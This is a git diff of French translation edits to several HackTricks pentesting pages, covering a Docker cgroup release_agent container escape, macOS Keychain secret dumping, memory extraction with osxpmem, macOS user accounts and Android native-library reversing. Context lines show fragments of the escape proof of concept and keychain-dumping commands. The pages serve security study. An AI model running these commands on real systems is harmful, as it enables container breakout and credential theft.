b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md @@ -2,25 +2,25 @@
-Apprenez le piratage AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)! +Apprenez le piratage AWS de zéro à héros avec htARTE (Expert Red Team AWS de HackTricks)! Autres façons de soutenir HackTricks: * Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)! * Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com) -* Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family) +* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family) * **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub. +* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-## WhiteIntel +### [WhiteIntel](https://whiteintel.io) -
+
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**. -Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de logiciels malveillants voleurs d'informations. +Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de logiciels malveillants volant des informations. Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur : @@ -47,14 +47,14 @@ La preuve de concept (PoC) démontre une méthode pour exploiter les cgroups en mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x ``` 2. **Configurer le sous-cgroupe enfant :** - - Un sous-cgroupe nommé "x" est créé dans le répertoire de cgroup monté. + - Un sous-cgroupe nommé "x" est créé à l'intérieur du répertoire de cgroup monté. - Les notifications sont activées pour le sous-cgroupe "x" en écrivant 1 dans son fichier notify_on_release. ```shell echo 1 > /tmp/cgrp/x/notify_on_release ``` 3. **Configurer l'Agent de Libération :** - Le chemin du conteneur sur l'hôte est obtenu à partir du fichier /etc/mtab. -- Le fichier release_agent du cgroup est ensuite configuré pour exécuter un script nommé /cmd situé dans le chemin d'accès de l'hôte acquis. +- Le fichier release_agent du cgroup est ensuite configuré pour exécuter un script nommé /cmd situé dans le chemin de l'hôte acquis. ```shell host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` echo "$host_path/cmd" > /tmp/cgrp/release_agent @@ -72,9 +72,9 @@ chmod a+x /cmd ```shell sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" ``` -## WhiteIntel +### [WhiteIntel](https://whiteintel.io) -
+
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **malwares voleurs**. @@ -90,10 +90,10 @@ Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur Autres façons de soutenir HackTricks : -* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)! +* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) ! * Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com) * Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family) * **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** nous sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub. +* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/macos-hardening/macos-red-teaming/macos-keychain.md b/macos-hardening/macos-red-teaming/macos-keychain.md index e12291d5d..34c79795e 100644 --- a/macos-hardening/macos-red-teaming/macos-keychain.md +++ b/macos-hardening/macos-red-teaming/macos-keychain.md @@ -1,4 +1,4 @@ -# Trousseau macOS +# macOS Keychain
@@ -6,17 +6,17 @@ Autres façons de soutenir HackTricks : -- Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) ! -- Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com) -- Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family) -- **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -- **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub. +* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) ! +* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com) +* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub.
-## WhiteIntel +### [WhiteIntel](https://whiteintel.io) -
+
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**. @@ -30,56 +30,56 @@ Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur ## Principaux trousseaux -- Le **trousseau utilisateur** (`~/Library/Keychains/login.keycahin-db`), qui est utilisé pour stocker les **informations d'identification spécifiques à l'utilisateur** telles que les mots de passe d'application, les mots de passe Internet, les certificats générés par l'utilisateur, les mots de passe réseau et les clés publiques/privées générées par l'utilisateur. -- Le **trousseau système** (`/Library/Keychains/System.keychain`), qui stocke les **informations d'identification à l'échelle du système** telles que les mots de passe WiFi, les certificats racine du système, les clés privées du système et les mots de passe d'application du système. +* Le **trousseau utilisateur** (`~/Library/Keychains/login.keycahin-db`), qui est utilisé pour stocker les **informations d'identification spécifiques à l'utilisateur** telles que les mots de passe d'application, les mots de passe Internet, les certificats générés par l'utilisateur, les mots de passe réseau et les clés publiques/privées générées par l'utilisateur. +* Le **trousseau système** (`/Library/Keychains/System.keychain`), qui stocke les **informations d'identification à l'échelle du système** telles que les mots de passe WiFi, les certificats racine du système, les clés privées du système et les mots de passe d'application du système. ### Accès au trousseau de mots de passe -Ces fichiers, bien qu'ils ne bénéficient pas d'une protection inhérente et puissent être **téléchargés**, sont chiffrés et nécessitent le **mot de passe en clair de l'utilisateur pour être déchiffrés**. Un outil comme [**Chainbreaker**](https://github.com/n0fate/chainbreaker) pourrait être utilisé pour le déchiffrement. +Ces fichiers, bien qu'ils n'aient pas de protection inhérente et puissent être **téléchargés**, sont chiffrés et nécessitent le **mot de passe en clair de l'utilisateur pour être déchiffrés**. Un outil comme [**Chainbreaker**](https://github.com/n0fate/chainbreaker) pourrait être utilisé pour le déchiffrement. ## Protections des entrées du trousseau -### ACLs +### ACL Chaque entrée dans le trousseau est régie par des **listes de contrôle d'accès (ACL)** qui dictent qui peut effectuer diverses actions sur l'entrée du trousseau, notamment : -- **ACLAuhtorizationExportClear** : Permet au détenteur d'obtenir le texte en clair du secret. -- **ACLAuhtorizationExportWrapped** : Permet au détenteur d'obtenir le texte en clair chiffré avec un autre mot de passe fourni. -- **ACLAuhtorizationAny** : Permet au détenteur d'effectuer n'importe quelle action. +* **ACLAuhtorizationExportClear** : Permet au détenteur d'obtenir le texte en clair du secret. +* **ACLAuhtorizationExportWrapped** : Permet au détenteur d'obtenir le texte en clair chiffré avec un autre mot de passe fourni. +* **ACLAuhtorizationAny** : Permet au détenteur d'effectuer n'importe quelle action. Les ACL sont accompagnées d'une **liste d'applications de confiance** qui peuvent effectuer ces actions sans invitation. Cela pourrait être : -- **N`il`** (aucune autorisation requise, **tout le monde est de confiance**) -- Une liste **vide** (personne n'est de confiance) -- Liste d'applications **spécifiques**. +* **N`il`** (aucune autorisation requise, **tout le monde est de confiance**) +* Une liste **vide** (personne n'est de confiance) +* Liste d'applications **spécifiques**. De plus, l'entrée peut contenir la clé **`ACLAuthorizationPartitionID`,** qui est utilisée pour identifier le **teamid, apple,** et **cdhash.** -- Si le **teamid** est spécifié, alors pour **accéder à la valeur de l'entrée** sans **invitation**, l'application utilisée doit avoir le **même teamid**. -- Si l'**apple** est spécifié, alors l'application doit être **signée** par **Apple**. -- Si le **cdhash** est indiqué, alors l'**application** doit avoir le **cdhash** spécifique. +* Si le **teamid** est spécifié, alors pour **accéder à la valeur de l'entrée** sans **invitation**, l'application utilisée doit avoir le **même teamid**. +* Si l'**apple** est spécifié, alors l'application doit être **signée** par **Apple**. +* Si le **cdhash** est indiqué, alors l'application doit avoir le **cdhash** spécifique. ### Création d'une entrée de trousseau -Lorsqu'une **nouvelle** **entrée** est créée à l'aide de **`Keychain Access.app`**, les règles suivantes s'appliquent : +Lorsqu'une **nouvelle** **entrée** est créée en utilisant **`Keychain Access.app`**, les règles suivantes s'appliquent : -- Toutes les applications peuvent chiffrer. -- Aucune application ne peut exporter/déchiffrer (sans inviter l'utilisateur). -- Toutes les applications peuvent voir le contrôle d'intégrité. -- Aucune application ne peut modifier les ACL. -- L'**ID de partition** est défini sur **`apple`**. +* Toutes les applications peuvent chiffrer. +* Aucune application ne peut exporter/déchiffrer (sans inviter l'utilisateur). +* Toutes les applications peuvent voir le contrôle d'intégrité. +* Aucune application ne peut modifier les ACL. +* L'**ID de partition** est défini sur **`apple`**. Lorsqu'une **application crée une entrée dans le trousseau**, les règles sont légèrement différentes : -- Toutes les applications peuvent chiffrer. -- Seule l'**application créatrice** (ou toute autre application ajoutée explicitement) peut exporter/déchiffrer (sans inviter l'utilisateur). -- Toutes les applications peuvent voir le contrôle d'intégrité. -- Aucune application ne peut modifier les ACL. -- L'**ID de partition** est défini sur **`teamid:[teamID ici]`**. +* Toutes les applications peuvent chiffrer. +* Seule l'**application créatrice** (ou toute autre application ajoutée explicitement) peut exporter/déchiffrer (sans inviter l'utilisateur). +* Toutes les applications peuvent voir le contrôle d'intégrité. +* Aucune application ne peut modifier les ACL. +* L'**ID de partition** est défini sur **`teamid:[teamID ici]`**. ## Accès au trousseau -### `sécurité` +### `security` ```bash # Dump all metadata and decrypted secrets (a lot of pop-ups) security dump-keychain -a -d @@ -93,12 +93,12 @@ security set-generic-password-parition-list -s "test service" -a "test acount" - ### APIs {% hint style="success" %} -L'**énumération et l'extraction** des secrets du trousseau qui **ne généreront pas de fenêtre contextuelle** peuvent être effectuées avec l'outil [**LockSmith**](https://github.com/its-a-feature/LockSmith) +La **numérotation et l'extraction** des secrets du trousseau qui **ne généreront pas de fenêtre contextuelle** peuvent être effectuées avec l'outil [**LockSmith**](https://github.com/its-a-feature/LockSmith) {% endhint %} Listez et obtenez des **informations** sur chaque entrée du trousseau : -* L'API **`SecItemCopyMatching`** fournit des informations sur chaque entrée et il existe quelques attributs que vous pouvez définir lors de son utilisation : +* L'API **`SecItemCopyMatching`** donne des informations sur chaque entrée et il existe quelques attributs que vous pouvez définir lors de son utilisation : * **`kSecReturnData`** : Si vrai, il tentera de décrypter les données (définissez-le sur faux pour éviter les fenêtres contextuelles potentielles) * **`kSecReturnRef`** : Obtenez également la référence de l'élément du trousseau (définissez-le sur vrai au cas où vous pourriez décrypter sans fenêtre contextuelle) * **`kSecReturnAttributes`** : Obtenez des métadonnées sur les entrées @@ -109,7 +109,7 @@ Obtenez les **ACL** de chaque entrée : * Avec l'API **`SecAccessCopyACLList`** vous pouvez obtenir l'**ACL de l'élément du trousseau**, et il renverra une liste d'ACL (comme `ACLAuhtorizationExportClear` et les autres mentionnés précédemment) où chaque liste a : * Description -* **Liste d'applications de confiance**. Cela pourrait être : +* Liste d'applications de confiance. Cela pourrait être : * Une application : /Applications/Slack.app * Un binaire : /usr/libexec/airportd * Un groupe : group://AirPort @@ -122,7 +122,7 @@ Exportez les données : Et voici les **conditions** pour pouvoir **exporter un secret sans fenêtre contextuelle** : * Si **1+ applications de confiance** sont répertoriées : -* Besoin des **autorisations appropriées** (**`Nil`**, ou être **partie** de la liste autorisée d'applications dans l'autorisation pour accéder aux informations secrètes) +* Besoin des **autorisations appropriées** (**`Nil`**, ou faire **partie** de la liste autorisée d'applications dans l'autorisation pour accéder aux informations secrètes) * Besoin que la signature de code corresponde à **PartitionID** * Besoin que la signature de code corresponde à celle d'une **application de confiance** (ou être membre du bon KeychainAccessGroup) * Si **toutes les applications sont de confiance** : @@ -133,7 +133,7 @@ Et voici les **conditions** pour pouvoir **exporter un secret sans fenêtre cont {% hint style="danger" %} Par conséquent, s'il y a **1 application répertoriée**, vous devez **injecter du code dans cette application**. -Si **apple** est indiqué dans le **PartitionID**, vous pourriez y accéder avec **`osascript`** pour tout ce qui fait confiance à toutes les applications avec apple dans le PartitionID. **`Python`** pourrait également être utilisé pour cela. +Si **apple** est indiqué dans le **partitionID**, vous pourriez y accéder avec **`osascript`** pour tout ce qui fait confiance à toutes les applications avec apple dans le partitionID. **`Python`** pourrait également être utilisé pour cela. {% endhint %} ### Deux attributs supplémentaires @@ -146,13 +146,13 @@ Si **apple** est indiqué dans le **PartitionID**, vous pourriez y accéder avec * [**#OBTS v5.0 : "Lock Picking the macOS Keychain" - Cody Thomas**](https://www.youtube.com/watch?v=jKE1ZW33JpY) -## WhiteIntel +### [WhiteIntel](https://whiteintel.io) -
+
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**. -Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de logiciels malveillants voleurs d'informations. +Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de logiciels malveillants volant des informations. Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur : @@ -167,7 +167,7 @@ Autres façons de soutenir HackTricks : * Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF** Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) ! * Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com) * Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Rejoignez** 💬 le groupe Discord](https://discord.gg/hRep4RUj7f) ou le [groupe telegram](https://t.me/peass) ou **suivez** nous sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Rejoignez** 💬 le groupe Discord](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** nous sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md index 5f59e5cf4..4e0694741 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md @@ -2,21 +2,21 @@
-Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)! +Apprenez le piratage AWS de zéro à héros avec htARTE (Expert Red Team AWS de HackTricks)! Autres façons de soutenir HackTricks : - Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) ! - Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com) -- Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family) +- Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family) - **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** - **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub.
-## WhiteIntel +### [WhiteIntel](https://whiteintel.io) -
+
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**. @@ -46,7 +46,7 @@ Il convient de noter que sur les systèmes MacOS modernes, ce fichier est géné Un autre fichier important lié à la mémoire dans les systèmes MacOS est le **journal de pression mémoire**. Ces journaux se trouvent dans `/var/log` et contiennent des informations détaillées sur l'utilisation de la mémoire du système et les événements de pression. Ils peuvent être particulièrement utiles pour diagnostiquer des problèmes liés à la mémoire ou comprendre comment le système gère la mémoire au fil du temps. -## Extraction de la mémoire avec osxpmem +## Extraction de mémoire avec osxpmem Pour extraire la mémoire d'une machine macOS, vous pouvez utiliser [**osxpmem**](https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip). @@ -58,7 +58,7 @@ sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem #Dump aff4 format sudo osxpmem.app/osxpmem -o /tmp/dump_mem.aff4 ``` -Si vous rencontrez cette erreur : `osxpmem.app/MacPmem.kext failed to load - (libkern/kext) authentication failure (file ownership/permissions); check the system/kernel logs for errors or try kextutil(8)` Vous pouvez la corriger en effectuant : +Si vous rencontrez cette erreur : `osxpmem.app/MacPmem.kext failed to load - (libkern/kext) authentication failure (file ownership/permissions); check the system/kernel logs for errors or try kextutil(8)` Vous pouvez le résoudre en faisant : ```bash sudo cp -r osxpmem.app/MacPmem.kext "/tmp/" sudo kextutil "/tmp/MacPmem.kext" @@ -76,13 +76,13 @@ cd /tmp; wget https://github.com/google/rekall/releases/download/v1.5.1/osxpmem- ``` {% endcode %} -## WhiteIntel +### [WhiteIntel](https://whiteintel.io) -
+
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **malwares voleurs**. -Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de malwares volant des informations. +Leur objectif principal est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de malwares volant des informations. Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur : @@ -90,7 +90,7 @@ Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur
-Apprenez le piratage AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)! +Apprenez le piratage AWS de zéro à héros avec htARTE (Expert de l'équipe rouge HackTricks AWS)! Autres façons de soutenir HackTricks : diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-users.md b/macos-hardening/macos-security-and-privilege-escalation/macos-users.md index 2c4b2ac2d..a961e2549 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-users.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-users.md @@ -2,27 +2,27 @@
-Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)! +Apprenez le piratage AWS de zéro à héros avec htARTE (Expert Red Team AWS de HackTricks)! -Autres façons de soutenir HackTricks : +Autres façons de soutenir HackTricks: -* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) ! +* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)! * Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com) -* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family) +* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family) * **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub.
-## WhiteIntel +### [WhiteIntel](https://whiteintel.io) -
+
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**. -Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de logiciels malveillants volant des informations. +Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de logiciels malveillants voleurs d'informations. -Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur : +Vous pouvez consulter leur site Web et essayer leur moteur gratuitement sur : {% embed url="https://whiteintel.io" %} @@ -30,12 +30,12 @@ Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur ### Utilisateurs Courants -* **Daemon** : Utilisateur réservé aux démons système. Les noms de compte de démon par défaut commencent généralement par un "\_": +* **Daemon**: Utilisateur réservé aux démons système. Les noms de compte de démon par défaut commencent généralement par un "\_": ```bash _amavisd, _analyticsd, _appinstalld, _appleevents, _applepay, _appowner, _appserver, _appstore, _ard, _assetcache, _astris, _atsserver, _avbdeviced, _calendar, _captiveagent, _ces, _clamav, _cmiodalassistants, _coreaudiod, _coremediaiod, _coreml, _ctkd, _cvmsroot, _cvs, _cyrus, _datadetectors, _demod, _devdocs, _devicemgr, _diskimagesiod, _displaypolicyd, _distnote, _dovecot, _dovenull, _dpaudio, _driverkit, _eppc, _findmydevice, _fpsd, _ftp, _fud, _gamecontrollerd, _geod, _hidd, _iconservices, _installassistant, _installcoordinationd, _installer, _jabber, _kadmin_admin, _kadmin_changepw, _knowledgegraphd, _krb_anonymous, _krb_changepw, _krb_kadmin, _krb_kerberos, _krb_krbtgt, _krbfast, _krbtgt, _launchservicesd, _lda, _locationd, _logd, _lp, _mailman, _mbsetupuser, _mcxalr, _mdnsresponder, _mobileasset, _mysql, _nearbyd, _netbios, _netstatistics, _networkd, _nsurlsessiond, _nsurlstoraged, _oahd, _ondemand, _postfix, _postgres, _qtss, _reportmemoryexception, _rmd, _sandbox, _screensaver, _scsd, _securityagent, _softwareupdate, _spotlight, _sshd, _svn, _taskgated, _teamsserver, _timed, _timezone, _tokend, _trustd, _trustevaluationagent, _unknown, _update_sharing, _usbmuxd, _uucp, _warmd, _webauthserver, _windowserver, _www, _wwwproxy, _xserverdocs ``` -* **Invité** : Compte pour les invités avec des autorisations très strictes +* **Guest**: Compte pour les invités avec des autorisations très strictes {% code overflow="wrap" %} ```bash @@ -47,23 +47,9 @@ for i in "${state[@]}"; do sysadminctl -"${i}" status; done; * **Personne**: Les processus sont exécutés avec cet utilisateur lorsque des autorisations minimales sont requises * **Root** -### Privilèges des utilisateurs +### Privilèges Utilisateur -* **Utilisateur standard**: Le plus basique des utilisateurs. Cet utilisateur a besoin d'autorisations accordées par un utilisateur administrateur lorsqu'il tente d'installer un logiciel ou d'effectuer d'autres tâches avancées. Ils ne peuvent pas le faire par eux-mêmes. -* **Utilisateur administrateur**: Un utilisateur qui opère la plupart du temps en tant qu'utilisateur standard mais qui est également autorisé à effectuer des actions root telles que l'installation de logiciels et d'autres tâches administratives. Tous les utilisateurs appartenant au groupe admin **ont accès à root via le fichier sudoers**. -* **Root**: Root est un utilisateur autorisé à effectuer presque n'importe quelle action (il existe des limitations imposées par des protections comme la Protection de l'intégrité du système). +* **Utilisateur Standard**: Le plus basique des utilisateurs. Cet utilisateur a besoin d'autorisations accordées par un utilisateur administrateur lorsqu'il tente d'installer un logiciel ou d'effectuer d'autres tâches avancées. Ils ne peuvent pas le faire par eux-mêmes. +* **Utilisateur Administrateur**: Un utilisateur qui opère la plupart du temps en tant qu'utilisateur standard mais qui est également autorisé à effectuer des actions root telles que l'installation de logiciels et d'autres tâches administratives. Tous les utilisateurs appartenant au groupe admin **ont accès à root via le fichier sudoers**. +* **Root**: Root est un utilisateur autorisé à effectuer presque n'importe quelle action (il existe des limitations imposées par des protections comme la Protection de l'Intégrité du Système). * Par exemple, root ne pourra pas placer un fichier à l'intérieur de `/System` - -
- -Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)! - -Autres façons de soutenir HackTricks: - -* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)! -* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com) -* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family) -* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** nous sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
diff --git a/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md b/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md index 78044ce17..2275e0422 100644 --- a/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md +++ b/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md @@ -1,4 +1,4 @@ -# Inversion de bibliothèques natives +# Inversion des bibliothèques natives
@@ -14,9 +14,9 @@ Autres façons de soutenir HackTricks :
-## WhiteIntel +### [WhiteIntel](https://whiteintel.io) -
+
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**. @@ -51,7 +51,7 @@ Les applications Android peuvent utiliser des bibliothèques natives, générale - **Liaison des méthodes Java aux fonctions natives :** - **Liaison dynamique :** Les noms de fonction dans les bibliothèques natives correspondent à un motif spécifique, permettant une liaison automatique. -- **Liaison statique :** Utilise `RegisterNatives` pour la liaison, offrant une flexibilité dans le nom et la structure des fonctions. +- **Liaison statique :** Utilise `RegisterNatives` pour la liaison, offrant une flexibilité dans la dénomination et la structure des fonctions. - **Outils et techniques de rétro-ingénierie :** - Des outils comme Ghidra et IDA Pro aident à analyser les bibliothèques natives. @@ -60,8 +60,8 @@ Les applications Android peuvent utiliser des bibliothèques natives, générale ### Ressources : - **Apprentissage de l'assemblage ARM :** -- Recommandé pour une compréhension plus approfondie de l'architecture sous-jacente. -- [Bases de l'assemblage ARM](https://azeria-labs.com/writing-arm-assembly-part-1/) d'Azeria Labs est recommandé. +- Recommandé pour une compréhension approfondie de l'architecture sous-jacente. +- [Bases de l'assemblage ARM](https://azeria-labs.com/writing-arm-assembly-part-1/) de Azeria Labs est recommandé. - **Documentation JNI & NDK :** - [Spécification JNI 